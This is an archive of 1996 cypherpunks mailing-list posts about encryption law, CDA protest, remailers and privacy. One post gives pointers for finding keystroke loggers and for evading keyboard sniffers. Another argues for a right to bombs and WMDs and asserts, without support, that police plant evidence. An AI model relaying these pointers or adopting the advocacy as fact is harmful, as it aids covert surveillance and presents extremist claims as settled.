*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 10 Mar 1996 19:28:36 +0800
To: Bjorn Asman <sakarias@tripnet.se>
Subject: Re: keystroks
In-Reply-To: <199603100754.IAA25888@heron.tripnet.se>
Message-ID: <3142B958.483C@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Bjorn Asman wrote:
> Is there anbody out there happens to [k]now a keystroke recorder thats
> record keystroks from dos to windows.

There are quite a few. Check the usual DOS ftp-sites or lurk around
alt.2600.  Note that you'll have a much harder time under Windows, since
it takes over the keyboard IRQ (though it might be possible to monitor
Int 16h).

Also note that some programs like SFS and a few network logins take
over the keyboard so as to prevent this.  (You can check out my kbisr
sources for non-enhanced keyboards if you're looking for a way around
keyboard sniffers... also floating around on ftp somewhere.)

> "It is the real, and not the map, whose vestiges[..]
> J. Baudrillard

Ack. A Baudrillard quote!


--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Mar 1996 23:04:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603101450.GAA16048@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

There was a discussion on How to install phone extension sometimes ago.   

Is there any appropriate URL or Usenet or Newsgroup or Mailing List available?

Please email directly to:     Durian@alpha.c2.org

Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sakarias@tripnet.se (Bjorn Asman)
Date: Sun, 10 Mar 1996 16:22:53 +0800
To: cypherpunks@toad.com
Subject: keystroks
Message-ID: <199603100754.IAA25888@heron.tripnet.se>
MIME-Version: 1.0
Content-Type: text/plain


Is there anbody out there happens to now a keystroke recorder thats record
keystroks from dos to windows.
please contact me if you know.
"It is the real, and not the map, whose vestiges
subsistr here and there, in the deserts which 
are no lionger those of the Empire, but our
own. The desert of the real itself."
J. Baudrillard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 11 Mar 1996 01:35:35 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Petty Civil Disobedience
Message-ID: <199603101719.JAA02292@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 3/9/96 -0500, Declan B. McCullagh wrote:
> Perhaps we should put up our own protest web sites with one or two
> explicit sexual images as real civil disobedience?

I have added a pornographic image to my web site as an act of 
real civil disobedience.  I urge others to do the same.

In the course of doing this, I discovered that on windows, Netscape 
makes jpegs of naked pretty girls look like crap. 

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 11 Mar 1996 00:10:31 +0800
To: cypherpunks@toad.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603100537.VAA24499@mail1.best.com>
Message-ID: <omXkkD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com writes:
> At 10:31 AM 3/9/96 -0500, Declan B. McCullagh wrote:
> > Perhaps we should put up our own protest web sites with one or two
> > explicit sexual images as real civil disobedience?
>
> Major problem here is that ten million horny geeks are likely to bring
> your server to its knees, but if one only has one image, and it is
> moderately small, say thirty thousand bytes, perhaps the flood would
> taper off eventually.

That's a good idea for a civil disobedience campaign: get a picture you
like from alt.binaries.pictures.erotica.*, shrink it to 20K or 30K, and
make it available on your homepage as ObCDA. Everybody who's got a home
page should display one. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sun, 10 Mar 1996 23:11:31 +0800
To: markm@voicenet.com (Mark M.)
Subject: Re: FCC & Internet phones
In-Reply-To: <Pine.LNX.3.91.960309173236.108A-100000@gak>
Message-ID: <199603101456.JAA08887@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text




> I wonder what exactly the FCC means by the term "Internet Phone."
> Does this just mean that software like IPhone will be regulated, or
> will this also apply

The thing is that at "best" the Iphone people (et al), are sell
Equipment!. NO ONE is SELLING phone service.. I mean Selling phone
service means some guy in NYC putting a sign on a store front offering
10 cents a minute calls "anyway where in the world."

When you or I use Iphone (etc), we are not selling anything.. Tarrifs
are for Selling.. Not "personal use." The only one selling anything is
IDT with there plans to have Iphone like calls start in the US go to
europe via the Internet and then switch them to regular POTS lines for
the call completion..

Any Legal options here?

Btw. the worst thing is all the phone companies are very very good
a lobbying... congress, the FCC, etc.

ALso once FCC regulations something commmerical speach becomes "restricted."
Eg., tobbaco ads..


/hawk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 04:11:28 +0800
To: cypherpunks@toad.com
Subject: Re: Explosives, Criminality, and Preemptive Action
Message-ID: <m0tvpbK-0008xkC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:03 AM 3/10/96 -0800, Timothy C. May wrote:

>My personal belief, from the news reports I've read (which may be
>incorrect, of course), is that the ingredients were for use in a bomb,
>whether or not they'd ever have gone through with it or not. The ancillary
>items found (dozens of assault rifles, weapons manuals, patriot literature,
>crank, meth, etc.), and the stockpiling of ANFO precursors, suggests an
>Oklahoma City-type scenario.

Justa sec, Tim, the second amendment says, "keep and bear _arms_", not 
merely "guns."  My dictionary defines arms as "objects used as weapons."  
Explosives can be used as weapons, both offensively and defensively.  Are 
you assuming that the possession of ANFO must be offensive?

>This is what I think was objective reality.
>Now, before certain readers go ballistic, start foaming about how TCMay and
>his Tentacles of Medusa are pawns of Bill and Hillary, not to mention spawn
>of Satan, etc., I'm not saying that what they did is criminal. Having the
>potential to build a bomb or other deadly gadget is not the same as
>actually building and using one. 

But again, it appears that you are assuming that "building a bomb" is not 
covered in the 2nd amendment.  I believe, to the contrary, that it very much 
is covered, even if this interpretation isn't very much respected.

>But should law enforcement have waited until the bomb 

"the bomb"?   Again, you're assuming a lot...  
What would you say to a person who buys 1000 pounds of AN, who claims to do 
it because he believes that some day, it might be outlawed or restricted 
severely by an even-more oppressive government?  Is there anything 
illegitimate in anticipating and preparing for the advent of tyranny?

>The argument that because farmers can use these products that the use must
>have been an innocent use is a weak one. Anyone with any common sense can
>see what they were up to. Who's kidding whom?

Again, I disagree.  I broadly interpret the 2nd amendment to  mean that I 
should be entitled to possess ANY "objects used as weapons," including 
chemical (both explosives and poisons), biological, and yes, nuclear.  

Thus, the possession of bomb-making materials cannot be interpreted as a 
by-definition-offensive position, and it isn't even clear to be that the 2nd 
amendment isn't supposed to cover weapons whose "only" use is offensive.  
Remember, the people who wrote the 2nd had just fought and won a revolution, 
and they were well aware that people needed the tools to do this if they 
were to stay free.

>Certainly the folks in Oregon will not face much prosecution, as near as I
>can figure. The weapons charges may affect their parole (some of them are
>ex-cons). The drug amounts are small. And the ANFO precursors....not clear
>to me at all that having these is a violation of the laws about explosives,
>but maybe it is.

Not in Oregon!  AN can be bought, without ID, in most places that stock
fertilizer.  

>>This whole situation is nothing more than jackbooted thugs getting a rush by
>>stomping on people.  FTJBT
>
>Overly simplistic. Don't misunderstand me: I share your anger at Waco, Ruby
>Ridge, gun confiscation, tens of thousands of laws, high taxes, etc. But I
>doubt the Oregon bust was a bunch of Waco Warriors assaulting the compound
>with tanks and helicopters.

True, it wasn't, but that was simply because those people in Oregon didn't 
choose to defend themselves.  Tiny amounts of drugs were found, all of which 
could have been planted by the cops to justify post-facto the raid.  (I'm 
not saying they WERE planted, merely that police are usually fully prepared 
for such eventualities.  Drugs are usually chosen because they are illegal 
per-se, and it's easier to sneak in an ounce of pot than 200 pounds of AN. 
 If they don't find anything suspicious, they usually come prepared to make 
their own evidence.  I know, because one of my best friends is an ex-cop who 
tells me all about this kind of stuff.)

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 11 Mar 1996 02:29:58 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Petty Civil Disobedience
Message-ID: <199603101821.KAA07814@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 10 Mar 1996 jamesd@echeque.com wrote:
> > I have added a pornographic image to my web site as an act of 
> > real civil disobedience.  I urge others to do the same.
> > 
> > In the course of doing this, I discovered that on windows, Netscape 
> > makes jpegs of naked pretty girls look like crap. 

At 11:40 AM 3/10/96 +0000, Ed Carp wrote:
> Check your screen resolution, and make sure it is displaying 256 colors 

It is not my screen, nor the image, but rather a very common defect in 
the way they have implemented Floyd Steinberg dithering.

They dither to the color cube, as does the Central Point Software file 
viewer, whose dithering program I wrote, but the Central point software 
file viewer does a vastly better job.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Mon, 11 Mar 1996 02:54:31 +0800
To: cypherpunks@toad.com
Subject: Offshore Online
Message-ID: <199603101833.KAA15479@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Yet another Offshore/Privacy provider is online.
Try http://194.157.210.14. If you're running First Class
Cleint set the network address to 194.157.210.14 port 3004
and create your own userid when you're online.

Cypherpunks/cypherpunks is a valid login, but has a daily
time limit of 30 minutes, so you might want to create a
new identity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 04:18:11 +0800
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: Lawz to be.
Message-ID: <m0tvqSz-00091kC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:55 PM 3/6/96 -0500, Matt Blaze wrote:
>> No, what the wording seems to outlaw was the use of encryption to obstruct 
>> the commission of the crime, not the investigation.  Read it again please.

>I suppose you could parse it that way if you really wanted to,

If  you acknowledge that, you are agreeing that a prosecutor could take that 
position to court, and until the Supreme Court decides he's wrong, he gets 
to harass citizens. 

> but it seems to me that the obvious meaning of this rather tortured language:
>  "Whoever willfully endeavors by means of encryption to obstruct, impede, or
>   prevent the communication of information in furtherance to a felony which
>   may be prosecuted in a court of the United States, to an investigative or
>   law enforcement officer shall..."
>is "...willfully endeavoring to obstruct by means of encryption the
>communication to an investigative or law enforcement officer information that
>is in furtherance of a felony..."

But what, exactly, is included in that latter meaning?  Does a person who 
runs an anonymous encrypted remailer, who is fully aware that somebody could 
be using his system at any moment to break a law, classify as in violation?  
That's the  problem, I think:  The government wants to shut down the USE of 
encryption among those it decides to target, while ostensibly keeping 
encryption legal.

>I think no reasonable person (judge, jury or prosecutor) would interpret
>it any other way. 

You're just as optimistic as Weinstein.  I'm not.

> Fortunately, the law is not a program that gets run on a
>computer.  People have to interpret it. 

That's a mixed blessing.  Are you aware of the fact that in the 1930's, the 
Supreme Court ruled that a farmer growing corn and feeding it to his pigs 
was engaging in "interstate commerce" because (the court "reasoned") if he 
didn't grow the corn it would have to be brought in to the state from 
another state (or displace other usages which would, themselves, have to 
need a similar import) so he was doing "interstate commerce."

(and just a few years later, in three separate cases, they upheld the 
internment of Japanese-Americans on the west coast as a preventative 
measure...)

Ignore this all you want, but the fact is that judges are sleazy people who
will 
do exactly what they want to do regardless of how wrong it is.

> In the case of this section, the
>awkward wording is an artificat of several iterations of narrowing it from
>what was originally a rather broad crime (as it still is in the House bill).

Whose fingerprints are on this portion of the bill?

>I would rather have the awkward (but still clear) wording than a broader 
crime.

I don't want any "new crimes," except possibly those that punish acts by 
government employees and officeholders.

>As it stands, several lawyers whose judgement I trust have told me that this
>provision is worded narrowly enough to apply only to people who can already
>be conviceted of the underlying crime and who can be proven to have used 
>encryption for the SOLE purpose of thwarting law enforcement.

That's not how the proposed law reads.  I realize that what you were given 
may be the "Walt Disney" version of the law, but reality will be 
dramatically different, I can assure you.  Maybe you ought to ask one of 
these lawyers if he is willing to write a legal brief describing the 
"worst-case scenario":  What a malicious prosecutor COULD do with this law 
if he so chose.  And remind him that the operators of encrypted remailers 
don't have the funds to take any appeals to the Supreme Court:  Lawyers are 
usually trained to knee-jerk assume that they can eventually get the "right" 
decision from the SC, which assumes _they_are_hired_ by a defendant who 
can afford this route.    

> I don't like
>this new crime (since it still stigmatizes encryption as being something
>criminals use), but I can probably live with it.

I cannot.   I _will_not_.

>Personally, on balance, I think the bill, as written, is a big
>enough step forward to be worth supporting.
>-matt

It sounds like you're assuming that this bill is a "take it or leave it" 
type of proposition.  I'm not.  I see no reason to come to some sort of a 
"Siskel and Ebert"-type of thumbs-up/thumbs-down decision on the whole thing.

I'll say it again:  If the only way this bill can be passed is the inclusion 
of this particular section, then that must mean that somebody "out there" 
must want that part REALLY badly.  And if they want it that badly, I want it 
gone even more!

Jim Bell
jimbell@pacifier.com
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUMjBvqHVDBboB2dAQGAlgP+IbkQsBm3FPKQNGQe/RvYAYHaoPvWVeZd
86AFx8hqi60nWvWUsAnZ0qGofjaMf1xNW49XKPOhY1lM3uJmeOnp4Wai0UOcwzSM
qvUufKkgyeEjC0RJgWqGWg1lKVmHKp4O3mava8jjYv8xQ4yYHP+yvHkAtGN9iLZr
3hjxMBp5S+8=
=2Ym6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 04:18:25 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Leahy's guillotine.
Message-ID: <m0tvqT4-00091oC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:11 AM 3/10/96 -0800, Bill Stewart wrote:
>Leahy et al.:
>>  Whoever willfully endeavors by means of encryption to obstruct,
>>   impede, or prevent the communication of information in furtherance
>>   to a felony which may be prosecuted in a court of the United States,
>>   to an investigative or law enforcement officer shall...
>
><Exonive deleted>!  
>
>Let's look at the word "willfully".  Among other things, it implies
>knowledge; under US law, to be guilty you have to know you did something
>that you at least reasonably believe is an activity that you're not supposed
>to do.

And if the government should take the position that the mere existence of an 
anonymous encrypted remail allows for illegal use, without detection by the 
operator, then a person could easily argue that the mere willful OPERATION 
of that remailer violates the section.

>Yes, cops can send you email threatening to use your remailer for
>felonious purposes, but if you don't know they've actually done it,
>and you haven't agreed with them to provide your encryption services
>in support of their felonious action, you're not a willing participant.

I disagree.  At least, I disagree that this interpretation will be 
automatically adopted by the government thugs.

>Especially if you've got the welcome banner on your remailer page
>saying "You may not use this email encryption service for thoughtcrime,
>violations of the verbal morality act, idea laundering, anti-abortion activism,
>or other felonious or Un-American activities."  You're no more a willful 
>participant than the guy who receives an unordered package of child pornography
>mailed by a postal inspector.

Which brings up a case from the midwest which (fortunately) was overturned 
by the SC a few years ago.  Seems a person was repeatedly sent ads (in 
reality, the ads came from the government!) offering some kind of 
pornographic material.  A "long time" later, he eventually "bit" and ordered 
something.  Needless to say, this was enough to get a search warrant, and a 
prosecution.  

Question:  Despite the fact that this conviction was eventually overturned, 
don't you think the prospect of a multi-year all-out battle with the 
prosecutors would be enough to deter people from doing things that they 
believed might really be legal, but would be looked on with disfavor by 
equally-sleazy prosecutors?

Why is it that I get the impression that the people who don't see this 
provision as being so bad have no sense of reality?  Are they not aware of 
the various ways prosecutors abuse their positions?

>Now, if they make this a felony, surely conspiracy to participate in
>such activities could eventually be made illegal, and if the DemoPublicrats
>get re-elected, it probably will be some day.  But this law doesn't do that 
yet.

In other words, they're aiming the gun at you, but they don't quite yet have 
their finger on the trigger.  When, exactly, do you start worrying?

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUMma/qHVDBboB2dAQGcTQP9E18kw/tyelFbXNRqqEsjwvK9gsig6npR
c+aC/B15zgDShJlcPEZXqJboAtE5w0osoEm8wC3uPVhQZNTam1lk0pgQCzCCTjVs
KMBDLOBTtzRovxNnq/YmTf01cCLGfFVSFXWa3MNUf0uJtRxgIiN3T7f5NjjlzCLW
4vWenZVpzi8=
=530O
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 11 Mar 1996 01:50:01 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Explosives, Criminality, and Preemptive Action
In-Reply-To: <199603101703.SAA09526@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9603101147.B17656-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


It is quite common to find ammonium nitrate fertilizer and diesel fuel on
a farm, as well as blasting caps, dynamite, gasoline, soap, and a host of
other things that could be used to make a bomb.  When non-country folks
bring it up, my most common reaction is, "so?" 

Lots of stuff that you find on a farm can be made to hurt lots of other
people.  Guns, rat poison, flammables, explosives ... the list goes on and
on.  Doesn't mean that they are used for such purposes, nor does it mean
that such would ever be anyone's intent.  They are tools, nothing more. 

Next thing you know, they'll be banning selling ammonia and chlorine 
bleach together.  Sheesh.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 11 Mar 1996 01:54:15 +0800
To: jamesd@echeque.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603101719.JAA02292@dns1.noc.best.net>
Message-ID: <Pine.3.89.9603101155.C17656-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996 jamesd@echeque.com wrote:

> I have added a pornographic image to my web site as an act of 
> real civil disobedience.  I urge others to do the same.
> 
> In the course of doing this, I discovered that on windows, Netscape 
> makes jpegs of naked pretty girls look like crap. 

Check your screen resolution, and make sure it is displaying 256 colors 
or more.  If it's set to 16 colors, it *will* look like crap.  Also might 
want to check the Preferences property sheets in Netscape.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 11 Mar 1996 01:14:12 +0800
To: cypherpunks@toad.com
Subject: Re: rhetorical trickery
Message-ID: <9603101655.AA20716@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>Or it's the list of local dairies, and the guy can't spel....

Diary, dairies... It gives me diarrhoea!

Jay Effay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Mon, 11 Mar 1996 01:10:38 +0800
To: cypherpunks@toad.com
Subject: FWD: FCC's Implementing the CDA Schedule
Message-ID: <9603101655.AA09844@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


FYI -

****************************************************
FCC Schedule for Rulemaking
Implementing The Communications
Decency Act

The FCC has announced a schedule for promulgating regulations implementing the
Telecommunications Act of 1996. The Communications Decency Act is number 28
on that schedule. The following is from the FCC announcement:

Issues/FCC Bureas

28. Obscene or Harassing Use of Telecom. Facilities

CCB [Common Carrier Bureau] 
[OGC] [Office of General Counsel] 

Statutory Requirements/Deadlines

Pursuant to section 223, FCC may describe measures which are reasonable,
effective, and appropriate to restrict access to prohibited communications. (83)

FCC shall have no enforcement authority over the failure to utilize such
measures. FCC shall not endorse specific products relating to such measures.(83)

FCC Proceedings

Section 223 Measures

Timetable

NOI [Notice of Inquiry] Third Quarter 1996
Policy Statement First Quarter 1997


For Further Information Contact:

Robert Cannon, Esq.
2358 N. Vernon Street
Arlington, VA 22207
202-862-4395 (o)
703-527-6631 (home office)



**********************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
**********************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Mon, 11 Mar 1996 01:26:14 +0800
To: cypherpunks@toad.com
Subject: Re: FWD: FCC's Implementing the CDA Schedule
Message-ID: <9603101704.AA10490@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  Oops.  The URL is: http://www.cais.net/cannon/noi.html/


**********************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
**********************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 04:36:25 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Leahy's guillotine.
Message-ID: <199603102019.MAA04267@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:11 AM 3/10/96 -0800, Bill Stewart wrote:
>Now, if they make this a felony, surely conspiracy to participate in
>such activities could eventually be made illegal, and if the DemoPublicrats
>get re-elected, it probably will be some day.  But this law doesn't do that 
>yet.

As far as I can tell, whether a pol is Republican or Democrat tells us
nothing about how s/he stands on issues such as free speech and free
crypto.  I am feeling friendly toward Lehey and Weld these days and hostile
toward Feinstein and Buchannan.

We need to treat them as individuals.  We need to learn and publicize their
positions on the issues that interest us.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 04:36:24 +0800
To: cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <199603102019.MAA04277@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I appologize for being trolled into more Assassination Politics discussion.
 I'll try to sit down, and be quiet and good.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 11 Mar 1996 05:35:48 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: rhetorical trickery
In-Reply-To: <199603100221.VAA13733@UNiX.asb.com>
Message-ID: <199603102119.NAA27691@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >> but I have a question: how did they know it was his diary?
>> >
>> >If I remember some earlier discussion about that case from a few years
>> >ago, the file was called "diary.pgp".
>> 
>> how did they know it was *his* diary?
>
>Well, nobody *knows*. But if you've got a file called diary.pgp on 
>your hard drive, chances are it's a diary of some sort. It's a 
>reasonable guess.
>
>Whether there's anything incriminating in it for him or anyone else 
>is another matter, of course.

all my respondents seem to be missing some basic points I have been
trying to make about law enforcement in the US.

the law runs on proof, and evidence. a file with the name "diary.pgp"
is not incriminating. it is not evidence. no one could be prosecuted
as a criminal for having a diary. there is the presumption of innocence
unless there is evidence and proof to the contrary. 

furthermore, suppose
the "pedophile" is actually prosecuted successfully. does that mean
the diary was incriminating? no, it does not. in the CA case it happened
that the pedophile was prosecuted without decrypting the diary. which
in fact argues in favor of the side that says, "cryptography is not
the end of law enforcement, and this case proves it."

as packwood demonstrates, it is easy to have a diary that one would 
want to encode to hide embarrassing information that is not 
necessarily incriminating.

now, a person might be successfully prosecuted for obstruction of
justice, or contempt of court, in refusing to hand over the 
decrypted diary (but the other post I made about giving the federal
agents a key that decrypts the file to a cookie recipe handles this
quite nicely).

somebody-or-other objected that the police are not likely to "buy
it" if such a situation occurs.

well, excuse me, but WHAT IS YOUR POINT? are you suggesting that they
are now going to have to resort to torture or something to elicit
the real key? last I checked, torture was illegal in our country...

please, will people stop sending me responses like the above? do you
understand how the American legal system works? a person cannot
be prosecuted without evidence. evidence cannot be illegally obtained.
a person is not required to testify against oneself.  these are all
basic long-established cornerstones of our legal system.

look, if someone WANTS to be put in jail for having encrypted files,
I'm sure you can probably figure out some way to pull it off. but
if you don't act like an idiot, such a thing is highly unlikely. it
clearly has not happened to date.

I am really amazed at all the times when I point out basic limitations
on e.g. the NSA or the law enforcement agencies, and somebody says, well
yes BUT so-and-so hypothetical situation might arise. it is almost as
if some people here have a secret "prosecute me" wish. why is there
such deep fear around here about life in the US today? I'd say 
that people here are high up on the list of creating the paranoia.
be careful what you fear, you might get it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 11 Mar 1996 02:49:23 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: [govt] artist coercion
Message-ID: <9603101837.AA24771@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart <stewarts@ix.netcom.com> wrote:

>I'll agree with that, except in cases where the corporate client is
>being coerced by government (or other Mafia) into not buying 
>some forms of controversial art.  We'd see more controversial
>movies/plays/performance art on TV, for instance, if the government
>weren't helping us.

The coercion occurs at the govt/businessman interface and it does
 not concern the artist/businessman interface.  If the artist 
refused to com promise, the businessman activities would be so 
lame that nobody would get interested in it.  And it is about 
time that the business world regain power.  I do not mean the big
govt-sucking business but the millions of small business that get
fleeced by the govt/big business affiliation.

>
>
>>JFA
>>Accepting a grant is accepting stolen money.
>Only a government grant, or a grant from other thieves...
>
>>Restore an objective monetary standard such as gold!
>
>I can see why you don't want the government telling us we have
>to use government-printed soft money, but why should they tell us
>we have to use "objective" money, whether gold, silver, or
> hempscript?
>Why should they be making those decisions for us at all?
>The free market can do a fine job of picking between competing
>hard, mushy, soft, and totally vaporous currencies, and
>encouraging or discouraging people from issueing them.  Of 
>course, if you believe
>in using government-funded courts to enforce your contracts,
>you're stuck with whatever subjective standards the government 
>feels like using.

I think that you are taking things out of context a bit.  A govt
is a tool that *we* create in order to help run certains things.
Among others, are the defence dept, the courts applying as 
objective as possibles laws and the issuing of money.  But today's 
govt is a living blood thirsty entity that went loose on it's 
own...

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMULKtciycyXFit0NAQF47gf9GTIlhde47TbZ3YRqKvCuQPiFZJvXsrgZ
TZxuLQBP2HxW2vFnBQZiPdW2tWVmUMl2ZX6dblKX2S2yHK54+JhGSLIdSGRdsTyW
iLnbu0b5LUT+bAcXOat7cR7JtoqoycbIbATsxLYi0W7U+9HImKWUhJmqsn8mD+Uo
6KmN4Z5TtWGdJ8MMXGncdAX9nhMZosilBfaAOUcm5vzLK2k0ehxNFvRusetuYGGW
i+KXkIV9csnWgZ5qfbT1VluPb/v5LIjP6BRxNTTm3PlqIPW7qFyqKHF+eu7PhPK9
vBrMj+hBVpPCE/oJ0xAI79MpJyTvDCfIcwrQrNMEnPoCTpGgGogc/w==
=nfLr
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Tait <rickt@psisa.com>
Date: Mon, 11 Mar 1996 04:03:06 +0800
To: Gary Howland <gary@kampai.euronet.nl>
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <2.2.32.19960310194049.006f9ecc@psisa.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 3/5/96 +0100, Gary Howland wrote:
>The passphrase could be kept in memory and entered
>every time the system is started.
>
>Gary

Right. Couldn't you insert some kind of var into the kernel, rebuild and
